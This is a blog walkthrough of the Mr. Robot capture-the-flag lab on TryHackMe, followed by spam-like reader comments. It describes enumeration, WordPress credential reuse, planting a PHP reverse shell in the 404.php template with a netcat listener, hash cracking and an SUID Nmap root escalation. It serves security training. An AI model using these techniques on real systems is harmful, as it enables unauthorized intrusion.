This post is a walkthrough of the famous Mr.Robot CTF virtual machine. I used the platform TryHackMe though you can also find this VM on Vulnhub. The goal is to find three hidden flags.
Let’s get started by deploying the machine. Now, after deploying the machine, start with a basic Nmap scan and see which ports and services are open and running on the particular IP address.
Nmap Scan:
Having ports 80 and 443 indicates we have a website running, so we open http://10.10.24.7 and https://10.10.24.7 on your browser.
The website is Mr. Robot themed website after running the commands mentioned in the picture just redirects to other pages which have images and videos from Mr. Robot TV show.
So now we know it is a website, so we should enumerate the directories by performing a gobuster scan and follow the basic enumeration like viewing the robots.txt page if it’s available or not.
Gobuster Scan
Now we’ll be employing a tool called gobuster, which uses an existing wordlist of possible common directories name and can attempt to load every directory name therein wordlist and would then look at status code. (If you are using Kali or ParrotOS, then you can find these wordlists at /usr/share/wordlists/dirbuster).
Now lets check the directories which returned a status code 200.
So, here in the license directory, we got some base64 encoded string lets to decode it and see what we get.
These could be the login credentials of the wp-admin page but before testing that we should look at the robots.txt file as it might contain some valuable information.
Here as we can see the robots.txt file contains tons of valuable information. It has some dictionary named fsocity.dic and the first flag i.e key-1-of-3.txt. So let’s goto these directories and download the dictionary as if in some case we got the username and password incorrect we could do a dictionary attack on the login page with the help of hydra.
Now let’s go to the login page and enter the credentials we found earlier in the license directory.
After entering the credentials we got to know that it is a WordPress website version 4.3.1, now generally in these scenarios we generally try to upload a reverse shell, we will upload pentester monkey’s PHP reverse shell in Appearance → Editor and then select 404.php on the right.
You just have to change the IP address to your IP address and any port that you desire.
You can see your IP address with the help of ifconfig command there in tun0 your IP address will be marked.
Now after changing the IP address and port no. paste your script in the edit section of 404.php
Now save the template and open netcat to listen the port 9999 in my case by firing the command in the terminal.
nc -nlvp 9999
Now either visit the 404.php or curl it using the terminal to receive the reverse shell.
Now see the netcat connection for the reverse shell must have been executed.
As you can see here we need to be user robot to see the key-2-of-3.txt file but we can still se the password.raw.md5 file, So let’s do that
Now we know that it is an MD5 hash, let’s try to decode it using a website named crackstation.
After getting the password for the user robot now let’s try to switch the user.
Switching user to robot
Privilege Escalation
Now, to capture the 3rd flag we need to upgrade from user to root for this we need to figure out which programs have SUID of at least 4000.
The logic is that Nmap has SUID bit set. A lot of times administrators set the SUID bit to nmap so that it can be used to scan the network efficiently as all the Nmap scanning techniques do not work if you don’t run it with root privilege.
However, there is a functionality in Nmap older versions where you can run Nmap in an interactive mode which allows you to escape to the shell. If Nmap has SUID bit set, it will run with root privilege and we can get access to the ‘root’ shell through its interactive mode.
Personal conclusion over tryhackme
Personally, I’ve had an amazing time in this room and learned a lot. TryHackMe has tons of other rooms, each different from another which gives a huge learning opportunity as well. I would try to upload writeups of rooms that I found interesting but for now, I hope you also learned something from this writeup.
Get the latest tech news and updates, ethical hacking tutorials and cybersecurity tips and tricks. Check out MeuSec for more.
Sometimes we include links to online retail stores and/or online campaigns. If you click on one and make a purchase we may receive a small commission.
Comments:
6 replies on “TryHackMe — Mr. Robot CTF Writeup”
“Appreciating the time and effort you put into your blog
and in depth information you provide. It’s awesome to come across a blog every once in a while that isn’t the same old rehashed
information. Fantastic read! I’ve bookmarked your site and I’m adding your RSS feeds to
my Google account.”
Putin
you are actually a good webmaster. The website loading velocity is amazing. It seems that you are doing any distinctive trick. In addition, The contents are masterpiece. you’ve done an excellent process on this subject
Regards Hannah Flack
Attractive section of content. I just stumbled upon your
site and in accession capital to assert that I acquire in fact enjoyed account your
blog posts. Anyway I will be subscribing to your augment
and even I achievement you access consistently fast.
I would like to thnkx for the efforts you have put in writing this blog. I am hoping the same high-grade blog post from you in the upcoming as well. In fact your creative writing abilities has inspired me to get my own blog now. Really the blogging is spreading its wings quickly. Your write up is a good example of it.
Thanks a lot mate.
It’s in reality a great and helpful piece of information. I am glad that you shared this useful info with us. Please keep us informed like this. Thank you for sharing.|